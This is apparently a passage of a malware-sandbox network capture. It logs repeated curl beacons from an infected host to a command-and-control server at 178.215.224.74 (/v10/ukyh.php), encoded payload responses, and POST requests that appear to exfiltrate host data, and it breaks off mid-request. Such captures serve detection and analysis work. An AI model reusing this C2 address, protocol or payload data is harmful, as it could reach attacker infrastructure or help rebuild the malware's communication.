                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:55.017038107 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:54 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      66192.168.2.550044178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:54.476454973 CET118OUTGET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:55.909356117 CET1236INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:55 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 39 34 62 38 0d 0a 56 55 56 7a 52 6b 70 41 55 55 46 4a 51 30 4e 42 51 55 78 72 56 32 56 55 53 6d 52 61 65 47 4a 79 51 58 46 50 53 45 46 51 55 32 6c 45 5a 55 6c 4f 51 55 46 42 51 32 45 7a 52 6e 46 68 57 46 4a 75 54 58 45 31 61 57 42 48 65 6e 45 76 57 6a 73 36 56 6b 78 56 4d 30 46 4a 4e 6d 64 46 4d 55 39 54 58 45 68 4a 53 6b 30 32 52 30 42 44 61 57 4e 4a 52 57 45 34 55 44 4e 4a 65 6b 5a 35 4e 57 6c 76 61 7a 4a 2f 62 31 4a 44 51 57 4e 42 53 55 31 41 52 45 70 77 56 56 55 37 64 6c 42 45 64 55 56 68 52 57 77 32 54 30 64 57 65 31 68 74 63 44 4e 6d 50 6d 4e 57 56 6c 38 70 4d 33 78 69 4c 56 56 7a 4f 7a 46 77 59 6a 46 38 55 6d 64 30 55 55 70 53 64 32 6c 54 61 43 74 62 54 6c 64 52 63 55 4e 54 61 55 6c 6e 51 45 6b 31 4e 32 70 77 54 46 6c 54 62 32 39 54 51 32 31 67 5a 46 56 51 62 32 64 52 51 31 68 4d 64 44 45 78 4d 32 55 6a 4b 58 59 78 55 48 45 70 56 58 68 47 4e 7a 64 77 50 7a 73 77 4e 54 64 61 57 46 64 75 64 6e 52 30 57 33 35 56 4e 33 56 69 54 30 70 4e 59 30 67 34 51 7a 68 52 4e 47 70 70 4f 32 78 51 4e 6d 52 [TRUNCATED]
                                      Data Ascii: d94b8VUVzRkpAUUFJQ0NBQUxrV2VUSmRaeGJyQXFPSEFQU2lEZUlOQUFBQ2EzRnFhWFJuTXE1aWBHenEvWjs6VkxVM0FJNmdFMU9TXEhJSk02R0BDaWNJRWE4UDNJekZ5NWlvazJ/b1JDQWNBSU1AREpwVVU7dlBEdUVhRWw2T0dWe1htcDNmPmNWVl8pM3xiLVVzOzFwYjF8Umd0UUpSd2lTaCtbTldRcUNTaUlnQEk1N2pwTFlTb29TQ21gZFVQb2dRQ1hMdDExM2UjKXYxUHEpVXhGNzdwPzswNTdaWFdudnR0W35VN3ViT0pNY0g4QzhRNGppO2xQNmRpLXYtL3E6Ui82Yk06eGVWbXstcEx4ZHY3WGQvN2lSVFYzO3ZjL3JHVFYnNjdxYntYOU8tVS83OzcnOUNRdi8wVSlvYDVNKWxmKy81PmRtUGRJUycrNk9sbDVyent4W2lGQUxIc1lmamx0WFZ1RmVnYzM2YSszY3B0MW5FYWIxYS9HMUh2RWkwMTV2S2tgOUk9cGVjQU5WRlIyaGpAYUtNNHkzbllaTmViOz5tUC92UkxZWGg0am1NdGM5bjVlSzZkRjJkL3BKanIvRlZmT3l0fUBpamthdVRVd0ozbF9cd2BZSjcrbitoWk0+O2U3ai07VC9qdFdRdzlccnpDN3NlSC0pLTU1dlZlcXBJb24vMWxJSG1JVXpwLUVRWUg/YmtIKzc4c2x3cWgtS0phVWJgNzhMdHVjUkhjSzd3a2RDZm0xVkM0N25TcUEwND9KYjROWEl9aFpSZilnMU5vck06MTRLUnlkejEvdEVodnFkMmRDdHcxdnVJd39HNWF6SzppOnZ7M2RpO0hhN1N5dGNsRnpUI1YxNkxObFFuZyNdc0ZDLUVQN3VUMmZgelQxd0pWbnFFMVM4Zi8/eG91SDM1T2xBYE5vLTREc2ZyUS1aT3t2NztUMzZSNXNubmR+SWZWaDtER0V2dVh0YjtwNi9AN2QyM1
                                      Nov 24, 2024 12:06:55.909492970 CET1236INData Raw: 4e 42 4f 54 46 5a 5a 6d 31 68 56 46 6f 35 55 33 49 7a 4d 6b 34 31 4f 6e 4d 31 65 53 74 49 56 7a 78 55 4e 30 4a 68 55 31 42 2f 64 6a 5a 47 5a 45 77 30 4b 55 5a 78 49 31 42 6d 4f 31 55 79 53 45 4d 76 4f 57 70 45 64 6c 46 53 4e 45 68 45 4f 6b 70 79
                                      Data Ascii: NBOTFZZm1hVFo5U3IzMk41OnM1eStIVzxUN0JhU1B/djZGZEw0KUZxI1BmO1UySEMvOWpEdlFSNEhEOkpyQilIVzZQUHpuOkFOZHd3STA7RHZ1OzMyTGpMMUhjSnN4Pm12amstWm03dHhQRHV0O2o3WmlpdDpGLUhYeU47Zm9mdy9KcVUnUjdUWE1mT01kZkxOdWA4V1VYI1I3dD4xRmsvLSktLTctOHA4XHJWMjJSTXBDVXF4Z
                                      Nov 24, 2024 12:06:55.909504890 CET1236INData Raw: 34 34 51 45 74 47 64 30 5a 67 4e 6a 4a 59 58 32 68 4d 4b 33 52 47 61 48 4a 32 52 30 70 6f 53 31 68 71 54 46 51 74 54 30 78 4d 4f 6b 39 6d 64 30 42 77 53 57 4a 77 54 31 55 35 4d 69 39 6b 55 57 78 30 59 56 45 7a 54 44 6c 46 62 45 74 37 4e 57 70 53
                                      Data Ascii: 44QEtGd0ZgNjJYX2hMK3RGaHJ2R0poS1hqTFQtT0xMOk9md0BwSWJwT1U5Mi9kUWx0YVEzTDlFbEt7NWpSWFFQNXZGbkVkTHBkY2k0VWpWRytnd21qZk5kTU11djRwN2xFeEhVcXgzYTVTV2RBdVRQN3Y6TkhjeEhccndDRndoeUdXLUNDdntIRVlDakRkS01yTXhVMjFlYTFaRVhWMExReXBXaU1sQWpIUUk6NW16MlFNQGw5d
                                      Nov 24, 2024 12:06:55.909514904 CET1236INData Raw: 6b 33 56 6e 68 30 4d 6d 46 71 4d 6c 4e 70 4f 44 5a 54 5a 30 52 41 51 30 4d 30 57 45 38 35 52 6b 64 4b 57 47 74 53 63 32 39 32 61 6d 63 33 55 56 64 70 54 44 41 7a 55 32 52 4c 57 54 46 6c 4e 6e 74 33 61 33 5a 68 65 55 70 33 59 6e 46 4a 63 6b 68 6e
                                      Data Ascii: k3Vnh0MmFqMlNpODZTZ0RAQ0M0WE85RkdKWGtSc292amc3UVdpTDAzU2RLWTFlNnt3a3ZheUp3YnFJckhnNm4rZHV3c21ITG0yO1VHdC8tSTRQN2NIK1VmZFIxUVlkLXIjRExVblVbSzdLPHxSe1ZSdVcyWGhaYE4wVlZZaVR4TnNINE9kQX0zT3dtWmpNUGZmN2tVTWJySGdla3JXRDdwYnZBRkpAO3Jrd3JSRnBDZmNsbFl1M
                                      Nov 24, 2024 12:06:55.909527063 CET1236INData Raw: 63 7a 5a 6a 4e 55 64 32 38 7a 63 31 64 73 61 79 64 65 57 6d 70 73 4e 55 46 43 5a 32 70 54 5a 6d 52 39 65 6b 56 36 5a 55 39 49 5a 7a 4a 6b 57 53 38 79 53 31 42 73 5a 33 45 31 62 54 68 72 53 6a 4d 74 62 6b 49 7a 53 45 56 6e 59 31 42 62 55 6b 6b 72
                                      Data Ascii: czZjNUd28zc1dsaydeWmpsNUFCZ2pTZmR9ekV6ZU9IZzJkWS8yS1BsZ3E1bThrSjMtbkIzSEVnY1BbUkkrTV0yYzxMVE1tcjUpRntbT01pRFtqVjN1dnBufndoeVdxMnFKKXdodGFxO1hRdnB3bzdpKXY2YzZReVp5RUMtUGU8YW5pSWR1T3VLbDdBJ2VjdnFyVTViUHFsaHJFRkwxaGN2Z3FJZkVoTWFlOkpOUHBON3BHK3c0R
                                      Nov 24, 2024 12:06:55.909540892 CET1236INData Raw: 68 79 56 56 5a 4c 4d 58 41 37 52 32 78 42 51 45 67 79 55 55 42 6d 5a 55 6c 55 61 31 4e 62 62 47 64 71 65 46 42 6d 59 58 56 74 4d 55 78 79 63 53 74 4d 62 32 70 56 4e 57 39 43 55 55 74 5a 54 57 35 61 4d 6b 64 56 4c 30 6f 32 63 54 4a 39 57 6c 55 79
                                      Data Ascii: hyVVZLMXA7R2xBQEgyUUBmZUlUa1NbbGdqeFBmYXVtMUxycStMb2pVNW9CUUtZTW5aMkdVL0o2cTJ9WlUyOFhoa1RFT1JXUmpZQ3hWejFVeHFWV0pydXRYN2x7QW5HUE5RQTp1QTFjTUBWWk5sS21gSGxBTnllNG5WbWwxbG50eGtwKUgzc3R1OG9Ta3k0WmtBdGNHZ21mNEl1dnhMUlNPcjMwc0M6SlJTUkFyfXo6R2lJbG5rd
                                      Nov 24, 2024 12:06:55.909578085 CET1236INData Raw: 46 4c 64 57 74 41 56 56 74 58 55 47 35 68 4f 30 74 6c 59 31 42 4b 62 6d 59 32 63 33 56 71 59 6c 5a 58 57 48 6b 30 5a 56 46 69 53 48 5a 6b 52 6c 46 48 4f 48 6c 45 5a 55 5a 4b 51 30 31 71 56 31 52 47 54 48 63 79 4e 6c 56 52 52 47 70 68 4e 31 52 42
                                      Data Ascii: FLdWtAVVtXUG5hO0tlY1BKbmY2c3VqYlZXWHk0ZVFiSHZkRlFHOHlEZUZKQ01qV1RGTHcyNlVRRGphN1RBNitTXTttcGtvZ2hsaDVsW0pScGZ5c1U1Q1ZMVXtOR1BpY3AybWl6dmNYRHpiNGtReGZFeURMWE9vR3htRm1SYmFwV19vY2ZXemFMRjtSY3pdTmpMN1c1VDBoeHdWcWA5Zys0MGtacUFOM0gwekxaWEpEM0ZlWEBJQ
                                      Nov 24, 2024 12:06:55.909594059 CET108INData Raw: 64 41 5a 48 42 50 64 30 55 32 51 33 42 31 63 44 46 47 54 30 68 57 62 46 56 59 55 6c 46 68 54 55 63 31 4b 31 64 68 59 32 77 33 56 57 59 38 53 48 64 72 4d 32 31 45 53 56 5a 61 64 30 31 49 59 30 30 79 54 56 56 49 59 55 63 35 56 46 56 6f 61 7a 46 52
                                      Data Ascii: dAZHBPd0U2Q3B1cDFGT0hWbFVYUlFhTUc1K1dhY2w3VWY8SHdrM21ESVZad01IY00yTVVIYUc5VFVoazFRK1JiUXd1c090SXE1Rm41ei1LY0
                                      Nov 24, 2024 12:06:55.909605026 CET1236INData Raw: 78 5a 56 33 5a 47 63 6a 5a 58 5a 44 52 57 64 46 68 63 64 6b 70 44 54 32 56 42 65 30 6c 59 65 45 6c 4b 4b 55 56 32 61 55 4a 53 59 45 64 59 56 6c 68 47 64 32 70 69 62 30 52 6e 59 33 5a 79 52 48 56 73 64 32 4a 57 52 58 5a 6f 51 48 68 59 4e 47 38 31
                                      Data Ascii: xZV3ZGcjZXZDRWdFhcdkpDT2VBe0lYeElKKUV2aUJSYEdYVlhGd2pib0RnY3ZyRHVsd2JWRXZoQHhYNG81dnBYSURkbSs1Yy1hb0ZIZW9id0l7NUpVRC1uUE5pQmxCUTczTi1KcHZSeHFSQFdDcVZzUmxlVFFGMkRNR0FuM0oyaExNY2lKV0R0YjR1bF56ZEUjN2VhZDFhLTA0S0xzQURGOkNycE5zdTk1TVoyWHg5d0praEpsZ
                                      Nov 24, 2024 12:06:55.909617901 CET1236INData Raw: 68 55 53 45 68 68 59 57 6c 4f 56 48 64 5a 4f 6b 64 4d 53 44 64 7a 54 55 56 72 62 7a 74 32 59 31 70 61 4b 30 5a 32 51 31 73 77 65 46 4e 69 4e 47 4e 58 5a 32 30 32 55 44 59 77 64 56 5a 6e 55 6c 67 34 52 57 42 4b 49 32 30 36 63 6c 73 37 57 46 68 69
                                      Data Ascii: hUSEhhYWlOVHdZOkdMSDdzTUVrbzt2Y1paK0Z2Q1sweFNiNGNXZ202UDYwdVZnUlg4RWBKI206cls7WFhiZXx7dntybnFkNTBaWlcxWHJZWDB7SjBTa3l5cHpjOVhkM3dFeGBrSG97VVp5Y0ZbeHhVdzluVFxuVU1UNFhsSDtveHFESjR6OFlNVnlqX21XV2NEVVRNdlN1b2pxcEVPZjN4bjFLZDRMQVRrL2VOSD1oSVlBRkw4O
                                      Nov 24, 2024 12:06:56.029256105 CET1236INData Raw: 46 31 65 6a 49 7a 4e 55 56 4b 4f 33 56 73 4f 57 39 34 55 6e 46 6f 63 6c 59 78 59 57 74 78 5a 56 70 7a 53 48 59 70 4c 56 52 59 4f 33 73 74 4f 6c 68 51 4b 30 64 32 4e 6d 74 6a 4f 33 78 42 4b 31 68 69 55 56 5a 46 4e 30 46 4d 63 6d 4a 77 53 6b 35 61
                                      Data Ascii: F1ejIzNUVKO3VsOW94UnFoclYxYWtxZVpzSHYpLVRYO3stOlhQK0d2NmtjO3xBK1hiUVZFN0FMcmJwSk5aT2tVUTB4UW5oWDNUTUoyYmVbMEUyXnZ4eWVpQHJEW0Y2VVFyM2hwM29RV2xsbXJccy85d0R1b05pTWdONW09NWYtSXo2YTdTVWRVV3RMWHdFYjJiYWxrWHxhTk1gQTc6RzJ+fW50dmExQU9YZEdpMWZ6d1NOSzNUM


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      67192.168.2.550045178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:55.223021030 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:56.551060915 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:56 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      68192.168.2.550046178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:57.165854931 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:06:58.507601023 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:06:58 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      69192.168.2.550047178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:59.262660980 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:00.573169947 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:00 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      70192.168.2.550048178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:06:59.291413069 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:00.602314949 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:00 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      71192.168.2.550049178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:00.713148117 CET625OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 331
                                      Cache-Control: no-cache
                                      Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 4e 6b 5a 47 39 75 63 31 35 44 63 48 42 47 59 58 52 68 58 6c 4a 6e 59 57 39 72 62 6d 64 65 52 47 31 75 63 6d 68 72 62 45 5a 31 62 58 42 78 56 48 4e 35 64 58 67 73 65 47 46 77 57 55 4a 66 4d 7a 49 79 4b 6a 4d 34 4f 54 41 78 4b 6b 45 36 58 46 56 7a 5a 58 4a 78 56 47 4e 73 5a 6d 39 73 63 56 78 42 63 6e 42 45 59 58 5a 68 56 46 4a 74 59 32 31 70 62 47 64 65 52 6d 31 73 63 6d 70 72 62 6b 52 31 62 33 68 78 58 48 46 78 64 33 49 6d 65 6d 74 79 57 55 4a 66
                                      Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGNkZG9uc15DcHBGYXRhXlJnYW9rbmdeRG1ucmhrbEZ1bXBxVHN5dXgseGFwWUJfMzIyKjM4OTAxKkE6XFVzZXJxVGNsZm9scVxBcnBEYXZhVFJtY21pbGdeRm1scmprbkR1b3hxXHFxd3ImemtyWUJf
                                      Nov 24, 2024 12:07:01.983961105 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:01 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      72192.168.2.550050178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:01.170134068 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:02.525516987 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:02 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      73192.168.2.550051178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:02.200848103 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:03.462672949 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:03 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      74192.168.2.550052178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:02.721672058 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:04.021311998 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:03 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      75192.168.2.550053178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:03.662314892 CET97OUTGET /v10/ukyh.php?jspo=8 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:05.023026943 CET336INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:04 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Content-Length: 112
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 5a 6d 46 73 63 57 31 2b 4b 69 6f 69 51 6e 5a 36 64 57 64 43 64 6e 42 33 5a 79 6f 7a 4f 69 4a 6b 59 32 78 78 5a 58 35 6d 59 57 78 7a 5a 33 5a 43 64 48 4a 31 5a 79 68 6d 59 57 35 7a 5a 55 42 32 63 6e 31 6c 51 6d 52 68 62 48 46 6c 4b 43 67 6f 4b 6b 4a 6b 59 32 78 7a 5a 53 68 30 66 6b 42 6d 61 57 35 78 62 55 42 43 64 6e 42 33 5a 77 3d 3d
                                      Data Ascii: ZmFscW1+KioiQnZ6dWdCdnB3ZyozOiJkY2xxZX5mYWxzZ3ZCdHJ1ZyhmYW5zZUB2cn1lQmRhbHFlKCgoKkJkY2xzZSh0fkBmaW5xbUBCdnB3Zw==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      76192.168.2.550054178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:05.069210052 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:06.380728006 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:06 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      77192.168.2.550055178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:05.213975906 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:06.538067102 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:06 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      78192.168.2.550056178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:06.573904037 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:07.880842924 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:07 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      79192.168.2.550057178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:07.287653923 CET136OUTGET /v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:08.600600004 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:08 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      80192.168.2.550058178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:08.443237066 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:09.750458956 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:09 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      81192.168.2.550059178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:08.851373911 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:10.170840979 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:09 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      82192.168.2.550060178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:10.131541014 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:07:11.452795982 CET207INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:07:11 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 8
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 64 6d 39 70 5a 67 3d 3d
                                      Data Ascii: dm9pZg==


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      83192.168.2.550061178.215.224.7480
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:07:10.304375887 CET294OUTPOST /v10/ukyh.php HTTP/1.1
                                      Accept: text/*
                                      Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                      User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                      Host: 178.215.224.74
                                      Content-Length: 833
                                      Cache-Control: no-cache
                                      Nov 24, 2024 12:07:10.304409981 CET833OUTData Raw: 6a 73 70 6f 3d 32 30 31 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 54 47 31 6b 64 47 6f 77 5a 48 4e 53 55 54 64 69 59 6a 41 79 4a 7a 46 47 66 6b 31 55 53 6d 35
